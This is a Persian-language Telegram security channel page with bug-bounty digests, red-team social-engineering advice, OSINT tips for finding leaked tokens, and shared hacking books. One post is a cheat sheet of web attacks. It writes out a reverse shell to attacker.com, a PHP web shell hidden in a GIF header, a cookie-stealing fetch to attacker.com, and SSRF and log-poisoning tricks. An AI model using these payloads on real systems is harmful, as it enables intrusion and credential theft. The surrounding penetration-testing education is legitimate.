RadvanSec – Telegram
RadvanSec
988 subscribers
178 photos
27 videos
140 files
593 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
📊 Watcher Summary Report

🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 12 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report

──────────────
📡 Follow :
👉 @zerosec_team
👍2🔥1
به نظر میرسه تلگرام، کانال گروه‌ های «تپندگان» و «عدالت علی» را به دلیل ریپورت های فراوان مسدود
کردند

──────────────
📡 Follow :
👉 @zerosec_team
4🖕4
💡 اهمیت مهندسی اجتماعی در رد تیم:
1. عبور از لایه‌های فنی امنیتی

فایروال، آنتی‌ویروس، WAF و سایر سیستم‌ها ممکنه نفوذ فنی رو سخت کنن، اما کارمند ساده‌ی بخش منابع انسانی ممکنه با یک تماس تلفنی فیشینگ، اطلاعات ورود رو در اختیار بذاره.
2. تست امنیت واقعی سازمان

هدف رد تیم، سنجش توانایی تشخیص و پاسخ به تهدیدات واقعیه. حملات مهندسی اجتماعی از رایج‌ترین روش‌های نفوذ در دنیای واقعی‌ان، پس باید تست بشن.
3. جمع‌آوری اطلاعات اولیه (OSINT)

مهندسی اجتماعی باعث دسترسی به اطلاعاتی میشه که به روش فنی قابل دسترسی نیستند: مثلاً شماره داخلی یک مدیر یا ساختار دقیق سازمان.
4. شبیه‌سازی حملات APT

حملات APT واقعی معمولا با مهندسی اجتماعی شروع می‌شن (مثلاً spear phishing). رد تیم باید این‌ها رو شبیه‌سازی کنه.

──────────────
📡 Follow : 👉 @zerosec_team
3👍1
Reza Mohamadzade
💡 اهمیت مهندسی اجتماعی در رد تیم: 1. عبور از لایه‌های فنی امنیتی فایروال، آنتی‌ویروس، WAF و سایر سیستم‌ها ممکنه نفوذ فنی رو سخت کنن، اما کارمند ساده‌ی بخش منابع انسانی ممکنه با یک تماس تلفنی فیشینگ، اطلاعات ورود رو در اختیار بذاره. 2. تست امنیت واقعی سازمان…
بایدها:

🔍 جمع‌آوری دقیق اطلاعات (OSINT)
قبل از هر حمله، باید همه‌چیز رو درباره هدف بدونی: ساختار سازمان، ایمیل کارمندان، شماره‌ها، ابزارهای مورد استفاده و...

🎯 تعریف هدف مشخص
آیا دنبال دسترسی به شبکه‌ای؟ کرنشیال؟ فایل خاص؟ همیشه هدفتو مشخص و مستند کن.

🎭 ساخت سناریوی باورپذیر
سناریوت باید واقعی به نظر برسه. مثلاً پشتیبان فنی، مسئول استخدام، یا بازرس امنیتی باشی.

🎬 تمرین اجرای سناریو
قبل از اجرا، سناریوت رو تمرین کن. لحن، زبان بدن، دیالوگ‌ها باید حرفه‌ای باشن.

🛡 هماهنگی با کارفرما
محدوده‌ها، مجوزها و محدودیت‌ها باید در قالب Rules of Engagement (ROE) از قبل توافق بشن.

📝 مستندسازی
هر کاری که انجام دادی، موفق یا ناموفق، باید دقیق لاگ بشه. مخصوصاً برای گزارش نهایی.

_____________________________________

نبایدها:

🚫 آسیب روحی به کارمندان
فریب باید کنترل‌شده باشه، نه باعث تحقیر، ترس یا استرس شدید.

🚫 تهدید یا اجبار
هیچ‌وقت از تهدید یا زبان توهین‌آمیز برای تست استفاده نکن.

🚫 خروج از محدوده
هر اقدامی خارج از محدوده‌ی تعیین‌شده (Scope) یعنی عبور از خط قرمز قانونی و اخلاقی.

🚫 ضبط مخفیانه بدون مجوز
ضبط صدا یا تصویر بدون اجازه ممکنه دردسر حقوقی داشته باشه.

🚫 تغییر داده‌های واقعی
وظیفه تو تخریب نیست؛ فقط باید ضعف‌ها رو نشون بدی.

🚫 افشای اطلاعات به خارج از تیم
اطلاعات جمع‌آوری‌شده فقط باید با کارفرما و تیم مجاز به اشتراک گذاشته بشه.

──────────────
📡 Follow : 👉 @zerosec_team
4👍1
📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 27 new items
🔹 INTIGRITI: 10 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report

──────────────
📡 Follow : 👉 @zerosec_team
3
🎯 اکسپلویت آسیب‌پذیری‌های وب برای دسترسی اولیه (Initial Access)

یه لیست توپ از تریک‌هایی که می‌تونی باهاشون از راه وب اپ دستتو بندازی داخل👇

🔥 1. RCE (Remote Code Execution)

مستقیم شل بفرست:
bash -i >& /dev/tcp/attacker.com/4444 0>&1

با curl یا wget اسکریپت اجرا کن
bypass فایروال با base64 یا ${IFS}

📂 2. File Upload

آپلود شل php، aspx، jsp
دور زدن فیلتر با:
shell.php.jpg یا shell.pHp
آپلود تصویری با کد PHP داخلش
GIF89a<?php system($_GET['cmd']); ?>


💉 3. SQL Injection → RCE

INTO OUTFILE برای ریختن شل روی سرور
MSSQL و xp_cmdshell برای اجرای دستور مستقیم

🧬 4. Command Injection

تست با: ;id, |whoami, && curl
استفاده از ${IFS} یا $(command)

🔁 5. SSRF → RCE یا Info Leak

دسترسی به metadata سرور:
http://169.254.169.254/...

اتصال به Redis بدون پسورد برای نوشتن SSH Key

🔐 6. Auth Bypass → دسترسی به Admin Panel

JWT با الگوریتم none
تست مسیرهایی مثل /admin، /debug

📦 7. Deserialization → RCE

با ysoserial یا PHPGGC پِیلود بساز
اجرا از طریق پارامترهایی که داده سریال‌شده می‌گیرن

📁 8. LFI → RCE

Poison کردن لاگ با شل
Include کردن sessionهای PHP
Log read از مسیر:
/var/log/apache2/access.log


9. XSS → سرقت کوکی admin یا CSRF

Stored XSS برای اجرا روی پنل ادمین
دزدیدن کوکی با:
fetch("https://attacker.com?c="+document.cookie)


⚙️ 10. Misconfig → Access

phpMyAdmin بی‌پسورد
Jenkins باز
.env یا .git لو رفته
configهای AWS و DB بدون حفاظت

_______________________________
📡 Join us 👉 @zerosec_team
4
هک فقط تو باگ بانتی خلاصه میشه؟ 🤔
+ That’s not my library!
+ Just Raspberry Pi book😍
_______________________________
📡 Join us 👉 @zerosec_team
3👍2🔥1😁1😍1
فکت :
جوری که مردم بخاطر ارزش پایین پول ملی رو اوردن به باگ بانتی و ترید واقعا پشم ریزونه
👎
_______________________________
📡 Join us 👉 @zerosec_team
👍11👎3
Violent_python_a_cookbook_for_hackers,_forensic_analysts,_T_J_OConnor.pdf
1.5 MB
Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers
#Book
_______________________________
📡 Join us 👉 @zerosec_team
2👍1
Black_Hat_Python,_2nd_Edition_Python_Programming_for_Seitz,_Justin.pdf
10 MB
Black Hat Python: Python Programming for Hackers and Pentesters
#Book
_______________________________
📡 Join us 👉 @zerosec_team
2🔥1
THE HACKER PLAYBOOK.pdf
8.7 MB
The Hacker Playbook 3: Practical Guide To Penetration Testing
#Book
_______________________________
📡 Join us 👉 @zerosec_team
1🔥1
No.Starch.Press.Rootkits.and.Bootkit.pdf
12.1 MB
Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats
#Book
_______________________________
📡 Join us 👉 @zerosec_team
🔥21
Sin0x001
Violent_python_a_cookbook_for_hackers,_forensic_analysts,_T_J_OConnor.pdf
به جای دیدن دوره های بی سر و ته کتاب بخونید و تمرین کنید
Read
Practice
Repeat

"Knowledge is power."
— Francis Bacon

_______________________________
📡 Join us 👉 @zerosec_team
👍32
فکت‌:
جایگاه باگ هانترا تو هک و امنیت معادل ورد پرس کارا بین طراح های سایت هاست🤣
_______________________________
📡 Join us 👉 @zerosec_team
🤣14🥰1😁1💅1
کدام یک از گروه های زیر دانش بیشتری دارن؟
Anonymous Quiz
7%
Pentester
21%
Security Researchers
46%
APTs
8%
Bug Hunter
18%
Red Teams
2👏1🐳1
RadvanSec
کدام یک از گروه های زیر دانش بیشتری دارن؟
چرا APTها دانش بیشتری دارن؟

حمایت مالی و تیمی دارن (معمولاً توسط دولت‌ها)
زمان زیادی برای تحقیق و تست دارن
به آسیب‌پذیری‌های (Zero-Day) دسترسی دارن
شبکه، سیستم‌عامل و ابزارهای دفاعی رو عمیقاً می‌فهمن
ردپا پاک می‌کنن و ماندگار می‌مونن بدون شناسایی
_______________________________
📡 Join us 👉 @zerosec_team
👍5
📊 Watcher Summary Report

🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 1 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report

──────────────
📡 Follow :
👉 @zerosec_team
1👍1🤩1
📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report

──────────────
📡 Follow :
👉 @zerosec_team
2👏1
📌 نقش و جایگاه OSINT در باگ‌بانتی:

1. 🎯 پیدا کردن اهداف مخفی (Scope Discovery)
با استفاده از OSINT می‌تونی:

ساب‌دامین‌هایی پیدا کنی که توی داکیومنت رسمی نیستن
زیرساخت‌هایی رو کشف کنی که در اسکوپ هستن ولی مستند نشده‌ان (مانند staging، test، admin، dev)
سرویس‌هایی مثل:
dev-payments.target.com
stg-api.targetcdn.net
خیلی وقتا باگ‌های حیاتی توی همین subdomainهای فراموش‌شده پیدا می‌شن.
2. 🧠 فهم بهتر ساختار شرکت و تکنولوژی‌ها
با تکنیک‌های OSINT می‌تونی:

بفهمی شرکت با چی ساخته شده (Tech stack: React, Laravel, NGINX, AWS...)
بفهمی تیم dev چطور deploy می‌کنن
ایمیل‌های کارکنان رو دربیاری (که به درد مهندسی اجتماعی یا رمز عبورهای قابل حدس می‌خوره)
3. 🔑 Credential Stuffing و کشف اطلاعات حساس
با سرچ در:

GitHub
Pastebin
Google Dork
می‌تونی دسترسی‌هایی مثل:

توکن‌های API
رمزهای پیش‌فرض
دامپ دیتابیس
فایل‌های env لو رفته
پیدا کنی و باهاشون ورود کنی یا آسیب‌پذیری کشف کنی.

4. 🔍 شناسایی حمله‌پذیری‌ها از روی سوشال‌مدیا و بلاگ‌ها
پست‌های کارکنان در لینکدین یا توییتر می‌تونه اطلاعاتی مثل:
فریم‌ورک‌ها
دامنه‌های در حال توسعه
تغییرات در سیستم auth
رو لو بده.

5. 📎 اتصال چند تکه اطلاعات به هم (Correlation)
مثلاً:

از طریق GitHub یه توکن می‌گیری
با اون به subdomainی که از crt.sh پیدا کردی auth می‌کنی
و در نهایت یه RCE می‌گیری
اینا فقط وقتی ممکن می‌شن که OSINT قوی باشه.

──────────────
📡 Follow :
👉 @zerosec_team
21👾1
RadvanSec
📌 نقش و جایگاه OSINT در باگ‌بانتی: 1. 🎯 پیدا کردن اهداف مخفی (Scope Discovery) با استفاده از OSINT می‌تونی: ساب‌دامین‌هایی پیدا کنی که توی داکیومنت رسمی نیستن زیرساخت‌هایی رو کشف کنی که در اسکوپ هستن ولی مستند نشده‌ان (مانند staging، test، admin، dev) سرویس‌هایی…
باگ‌هایی که با پاداش‌های بزرگ همراه هستن، لزومی نداره صرفاً از مهارت‌های فنی نشأت بگیرن.
خیلی از اونا حاصل این مواردن:

۱- خطای انسانی (Human Error)
۲- بی‌توجهی تیم‌ها به اصول پایه
۳- ضعف در ساختار تیم DevSecOps
۴- یا حتی فقط عجله در دیپلوی یه فیچر قبل از ددلاین

خیلی از هکرهای تاپ:

رد تیم واقعی اجرا می‌کنن
با ترکیب OSINT + Social Engineering + Fuzzing + دسترسی داخلی، عملاً وارد سیستم می‌شن مثل یه نفوذگر داخل سازمان
دسترسی‌ رو Persist می‌کنن، یعنی بعد از اولین ورود، راه دومی هم می‌سازن که اگه مسیر اول قطع شد، همچنان داخل بمونن
حتی بعضی وقت‌ها، مثل وایت‌باکس پنتسترها، کل ساختار کد رو هم می‌تونن تحلیل کنن (مثلاً از روی سورس لو رفته در GitHub یا Leak داخلی)

مثال واقعی (ترکیب فنی + انسانی):

یه هکر:

توی LinkedIn می‌فهمه فلانی dev تیم auth شرکت X هست.
تو GitHub دنبال ریپوهای این شخص می‌گرده.
توی یه ریپو، فایل .env توی commit اولیه push شده ولی بعداً حذف شده.
با git-dorking فایل رو بازیابی می‌کنه → توکن dev می‌گیره.
توکن رو تست می‌کنه → می‌بینه به staging همون auth سرور وصله.
از اونجا SSRF → RCE → دسترسی به production DB
ولی اگر نگاه کنی:

هیچ‌کدوم از این مراحل pure technical exploit نبود. همه‌ش Human Layer+OSINT+Persistence بود.

──────────────
📡 Follow :
👉 @zerosec_team
4🤝1👾1
RadvanSec
باگ‌هایی که با پاداش‌های بزرگ همراه هستن، لزومی نداره صرفاً از مهارت‌های فنی نشأت بگیرن. خیلی از اونا حاصل این مواردن: ۱- خطای انسانی (Human Error) ۲- بی‌توجهی تیم‌ها به اصول پایه ۳- ضعف در ساختار تیم DevSecOps ۴- یا حتی فقط عجله در دیپلوی یه فیچر قبل از…
“ تو ماشین تست نیستی ”

اگه امروز مثل یه ابزار فکر کنی، فردا با ابزار جایگزین می‌شی.
ولی اگه مثل یه مهاجم واقعی فکر کنی، غیرقابل‌ تکرار می‌شی.

بخشی از نگرش جدید یک هکر واقعی:
کمتر ابزار، بیشتر تحلیل ذهنی
ترکیب فنی + روانشناسی + OSINT
نگاه سیستمی به سازمان هدف
تفکر مثل insider یا red team

و در کل استایل هانت کردن شما خیلی مهمه✌️
سعی کنید تفکر black داشته باشید ولی نتیجه white hat باشید


──────────────
📡 Follow :
👉 @zerosec_team
2🔥1💯1